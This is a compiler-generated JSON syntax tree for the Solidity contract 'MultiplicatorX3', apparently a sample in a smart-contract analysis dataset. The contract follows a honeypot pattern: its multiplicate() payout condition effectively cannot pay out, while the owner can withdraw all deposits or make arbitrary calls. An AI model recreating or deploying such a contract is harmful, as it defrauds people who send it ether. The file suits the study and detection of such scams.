{
    "attributes": {
        "absolutePath": "<stdin>",
        "exportedSymbols": {
            "MultiplicatorX3": [
                76
            ]
        }
    },
    "children": [
        {
            "attributes": {
                "baseContracts": [
                    null
                ],
                "contractDependencies": [
                    null
                ],
                "contractKind": "contract",
                "documentation": null,
                "fullyImplemented": true,
                "linearizedBaseContracts": [
                    76
                ],
                "name": "MultiplicatorX3",
                "scope": 77
            },
            "children": [
                {
                    "attributes": {
                        "constant": false,
                        "name": "Owner",
                        "scope": 76,
                        "stateVariable": true,
                        "storageLocation": "default",
                        "type": "address",
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "name": "address",
                                "type": "address"
                            },
                            "id": 1,
                            "name": "ElementaryTypeName",
                            "src": "108:7:0"
                        },
                        {
                            "attributes": {
                                "argumentTypes": null,
                                "isConstant": false,
                                "isLValue": false,
                                "isPure": false,
                                "lValueRequested": false,
                                "member_name": "sender",
                                "referencedDeclaration": null,
                                "type": "address"
                            },
                            "children": [
                                {
                                    "attributes": {
                                        "argumentTypes": null,
                                        "overloadedDeclarations": [
                                            null
                                        ],
                                        "referencedDeclaration": 91,
                                        "type": "msg",
                                        "value": "msg"
                                    },
                                    "id": 2,
                                    "name": "Identifier",
                                    "src": "131:3:0"
                                }
                            ],
                            "id": 3,
                            "name": "MemberAccess",
                            "src": "131:10:0"
                        }
                    ],
                    "id": 4,
                    "name": "VariableDeclaration",
                    "src": "108:33:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "",
                        "payable": true,
                        "scope": 76,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 5,
                            "name": "ParameterList",
                            "src": "159:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 6,
                            "name": "ParameterList",
                            "src": "176:0:0"
                        },
                        {
                            "attributes": {
                                "statements": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 7,
                            "name": "Block",
                            "src": "176:2:0"
                        }
                    ],
                    "id": 8,
                    "name": "FunctionDefinition",
                    "src": "151:27:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "withdraw",
                        "payable": true,
                        "scope": 76,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 9,
                            "name": "ParameterList",
                            "src": "204:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 10,
                            "name": "ParameterList",
                            "src": "234:0:0"
                        },
                        {
                            "children": [
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            94,
                                                            95
                                                        ],
                                                        "referencedDeclaration": 94,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 11,
                                                    "name": "Identifier",
                                                    "src": "244:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 91,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 12,
                                                                    "name": "Identifier",
                                                                    "src": "252:3:0"
                                                                }
                                                            ],
                                                            "id": 13,
                                                            "name": "MemberAccess",
                                                            "src": "252:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 14,
                                                            "name": "Identifier",
                                                            "src": "266:5:0"
                                                        }
                                                    ],
                                                    "id": 15,
                                                    "name": "BinaryOperation",
                                                    "src": "252:19:0"
                                                }
                                            ],
                                            "id": 16,
                                            "name": "FunctionCall",
                                            "src": "244:28:0"
                                        }
                                    ],
                                    "id": 17,
                                    "name": "ExpressionStatement",
                                    "src": "244:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_uint256",
                                                                "typeString": "uint256"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "transfer",
                                                        "referencedDeclaration": null,
                                                        "type": "function (uint256)"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 18,
                                                            "name": "Identifier",
                                                            "src": "282:5:0"
                                                        }
                                                    ],
                                                    "id": 20,
                                                    "name": "MemberAccess",
                                                    "src": "282:14:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "balance",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 104,
                                                                "type": "contract MultiplicatorX3",
                                                                "value": "this"
                                                            },
                                                            "id": 21,
                                                            "name": "Identifier",
                                                            "src": "297:4:0"
                                                        }
                                                    ],
                                                    "id": 22,
                                                    "name": "MemberAccess",
                                                    "src": "297:12:0"
                                                }
                                            ],
                                            "id": 23,
                                            "name": "FunctionCall",
                                            "src": "282:28:0"
                                        }
                                    ],
                                    "id": 24,
                                    "name": "ExpressionStatement",
                                    "src": "282:28:0"
                                }
                            ],
                            "id": 25,
                            "name": "Block",
                            "src": "234:83:0"
                        }
                    ],
                    "id": 26,
                    "name": "FunctionDefinition",
                    "src": "187:130:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "Command",
                        "payable": true,
                        "scope": 76,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "adr",
                                        "scope": 52,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "address",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "address",
                                                "type": "address"
                                            },
                                            "id": 27,
                                            "name": "ElementaryTypeName",
                                            "src": "344:7:0"
                                        }
                                    ],
                                    "id": 28,
                                    "name": "VariableDeclaration",
                                    "src": "344:11:0"
                                },
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "data",
                                        "scope": 52,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "bytes",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "bytes",
                                                "type": "bytes"
                                            },
                                            "id": 29,
                                            "name": "ElementaryTypeName",
                                            "src": "356:5:0"
                                        }
                                    ],
                                    "id": 30,
                                    "name": "VariableDeclaration",
                                    "src": "356:10:0"
                                }
                            ],
                            "id": 31,
                            "name": "ParameterList",
                            "src": "343:24:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 32,
                            "name": "ParameterList",
                            "src": "395:0:0"
                        },
                        {
                            "children": [
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            94,
                                                            95
                                                        ],
                                                        "referencedDeclaration": 94,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 33,
                                                    "name": "Identifier",
                                                    "src": "405:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 91,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 34,
                                                                    "name": "Identifier",
                                                                    "src": "413:3:0"
                                                                }
                                                            ],
                                                            "id": 35,
                                                            "name": "MemberAccess",
                                                            "src": "413:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 36,
                                                            "name": "Identifier",
                                                            "src": "427:5:0"
                                                        }
                                                    ],
                                                    "id": 37,
                                                    "name": "BinaryOperation",
                                                    "src": "413:19:0"
                                                }
                                            ],
                                            "id": 38,
                                            "name": "FunctionCall",
                                            "src": "405:28:0"
                                        }
                                    ],
                                    "id": 39,
                                    "name": "ExpressionStatement",
                                    "src": "405:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "bool",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bytes_memory_ptr",
                                                                "typeString": "bytes memory"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "isStructConstructorCall": false,
                                                        "lValueRequested": false,
                                                        "names": [
                                                            null
                                                        ],
                                                        "type": "function () payable returns (bool)",
                                                        "type_conversion": false
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": [
                                                                    {
                                                                        "typeIdentifier": "t_uint256",
                                                                        "typeString": "uint256"
                                                                    }
                                                                ],
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "function (uint256) returns (function () payable returns (bool))"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "call",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function () payable returns (bool)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 28,
                                                                                "type": "address",
                                                                                "value": "adr"
                                                                            },
                                                                            "id": 40,
                                                                            "name": "Identifier",
                                                                            "src": "488:3:0"
                                                                        }
                                                                    ],
                                                                    "id": 43,
                                                                    "name": "MemberAccess",
                                                                    "src": "488:8:0"
                                                                }
                                                            ],
                                                            "id": 44,
                                                            "name": "MemberAccess",
                                                            "src": "488:14:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "uint256"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 91,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 45,
                                                                    "name": "Identifier",
                                                                    "src": "503:3:0"
                                                                }
                                                            ],
                                                            "id": 46,
                                                            "name": "MemberAccess",
                                                            "src": "503:9:0"
                                                        }
                                                    ],
                                                    "id": 47,
                                                    "name": "FunctionCall",
                                                    "src": "488:25:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "overloadedDeclarations": [
                                                            null
                                                        ],
                                                        "referencedDeclaration": 30,
                                                        "type": "bytes memory",
                                                        "value": "data"
                                                    },
                                                    "id": 48,
                                                    "name": "Identifier",
                                                    "src": "514:4:0"
                                                }
                                            ],
                                            "id": 49,
                                            "name": "FunctionCall",
                                            "src": "488:31:0"
                                        }
                                    ],
                                    "id": 50,
                                    "name": "ExpressionStatement",
                                    "src": "488:31:0"
                                }
                            ],
                            "id": 51,
                            "name": "Block",
                            "src": "395:131:0"
                        }
                    ],
                    "id": 52,
                    "name": "FunctionDefinition",
                    "src": "327:199:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "multiplicate",
                        "payable": true,
                        "scope": 76,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "adr",
                                        "scope": 75,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "address",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "address",
                                                "type": "address"
                                            },
                                            "id": 53,
                                            "name": "ElementaryTypeName",
                                            "src": "558:7:0"
                                        }
                                    ],
                                    "id": 54,
                                    "name": "VariableDeclaration",
                                    "src": "558:11:0"
                                }
                            ],
                            "id": 55,
                            "name": "ParameterList",
                            "src": "557:13:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 56,
                            "name": "ParameterList",
                            "src": "598:0:0"
                        },
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "falseBody": null
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "commonType": {
                                                    "typeIdentifier": "t_uint256",
                                                    "typeString": "uint256"
                                                },
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "lValueRequested": false,
                                                "operator": ">=",
                                                "type": "bool"
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "value",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 91,
                                                                "type": "msg",
                                                                "value": "msg"
                                                            },
                                                            "id": 57,
                                                            "name": "Identifier",
                                                            "src": "611:3:0"
                                                        }
                                                    ],
                                                    "id": 58,
                                                    "name": "MemberAccess",
                                                    "src": "611:9:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "balance",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 104,
                                                                "type": "contract MultiplicatorX3",
                                                                "value": "this"
                                                            },
                                                            "id": 59,
                                                            "name": "Identifier",
                                                            "src": "622:4:0"
                                                        }
                                                    ],
                                                    "id": 60,
                                                    "name": "MemberAccess",
                                                    "src": "622:12:0"
                                                }
                                            ],
                                            "id": 61,
                                            "name": "BinaryOperation",
                                            "src": "611:23:0"
                                        },
                                        {
                                            "children": [
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "isStructConstructorCall": false,
                                                                "lValueRequested": false,
                                                                "names": [
                                                                    null
                                                                ],
                                                                "type": "tuple()",
                                                                "type_conversion": false
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": [
                                                                            {
                                                                                "typeIdentifier": "t_uint256",
                                                                                "typeString": "uint256"
                                                                            }
                                                                        ],
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "transfer",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function (uint256)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 54,
                                                                                "type": "address",
                                                                                "value": "adr"
                                                                            },
                                                                            "id": 62,
                                                                            "name": "Identifier",
                                                                            "src": "666:3:0"
                                                                        }
                                                                    ],
                                                                    "id": 64,
                                                                    "name": "MemberAccess",
                                                                    "src": "666:12:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "commonType": {
                                                                            "typeIdentifier": "t_uint256",
                                                                            "typeString": "uint256"
                                                                        },
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "operator": "+",
                                                                        "type": "uint256"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "isConstant": false,
                                                                                "isLValue": false,
                                                                                "isPure": false,
                                                                                "lValueRequested": false,
                                                                                "member_name": "balance",
                                                                                "referencedDeclaration": null,
                                                                                "type": "uint256"
                                                                            },
                                                                            "children": [
                                                                                {
                                                                                    "attributes": {
                                                                                        "argumentTypes": null,
                                                                                        "overloadedDeclarations": [
                                                                                            null
                                                                                        ],
                                                                                        "referencedDeclaration": 104,
                                                                                        "type": "contract MultiplicatorX3",
                                                                                        "value": "this"
                                                                                    },
                                                                                    "id": 65,
                                                                                    "name": "Identifier",
                                                                                    "src": "679:4:0"
                                                                                }
                                                                            ],
                                                                            "id": 66,
                                                                            "name": "MemberAccess",
                                                                            "src": "679:12:0"
                                                                        },
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "isConstant": false,
                                                                                "isLValue": false,
                                                                                "isPure": false,
                                                                                "lValueRequested": false,
                                                                                "member_name": "value",
                                                                                "referencedDeclaration": null,
                                                                                "type": "uint256"
                                                                            },
                                                                            "children": [
                                                                                {
                                                                                    "attributes": {
                                                                                        "argumentTypes": null,
                                                                                        "overloadedDeclarations": [
                                                                                            null
                                                                                        ],
                                                                                        "referencedDeclaration": 91,
                                                                                        "type": "msg",
                                                                                        "value": "msg"
                                                                                    },
                                                                                    "id": 67,
                                                                                    "name": "Identifier",
                                                                                    "src": "692:3:0"
                                                                                }
                                                                            ],
                                                                            "id": 68,
                                                                            "name": "MemberAccess",
                                                                            "src": "692:9:0"
                                                                        }
                                                                    ],
                                                                    "id": 69,
                                                                    "name": "BinaryOperation",
                                                                    "src": "679:22:0"
                                                                }
                                                            ],
                                                            "id": 70,
                                                            "name": "FunctionCall",
                                                            "src": "666:36:0"
                                                        }
                                                    ],
                                                    "id": 71,
                                                    "name": "ExpressionStatement",
                                                    "src": "666:36:0"
                                                }
                                            ],
                                            "id": 72,
                                            "name": "Block",
                                            "src": "644:69:0"
                                        }
                                    ],
                                    "id": 73,
                                    "name": "IfStatement",
                                    "src": "608:105:0"
                                }
                            ],
                            "id": 74,
                            "name": "Block",
                            "src": "598:121:0"
                        }
                    ],
                    "id": 75,
                    "name": "FunctionDefinition",
                    "src": "536:183:0"
                }
            ],
            "id": 76,
            "name": "ContractDefinition",
            "src": "77:644:0"
        }
    ],
    "id": 77,
    "name": "SourceUnit",
    "src": "77:645:0"
}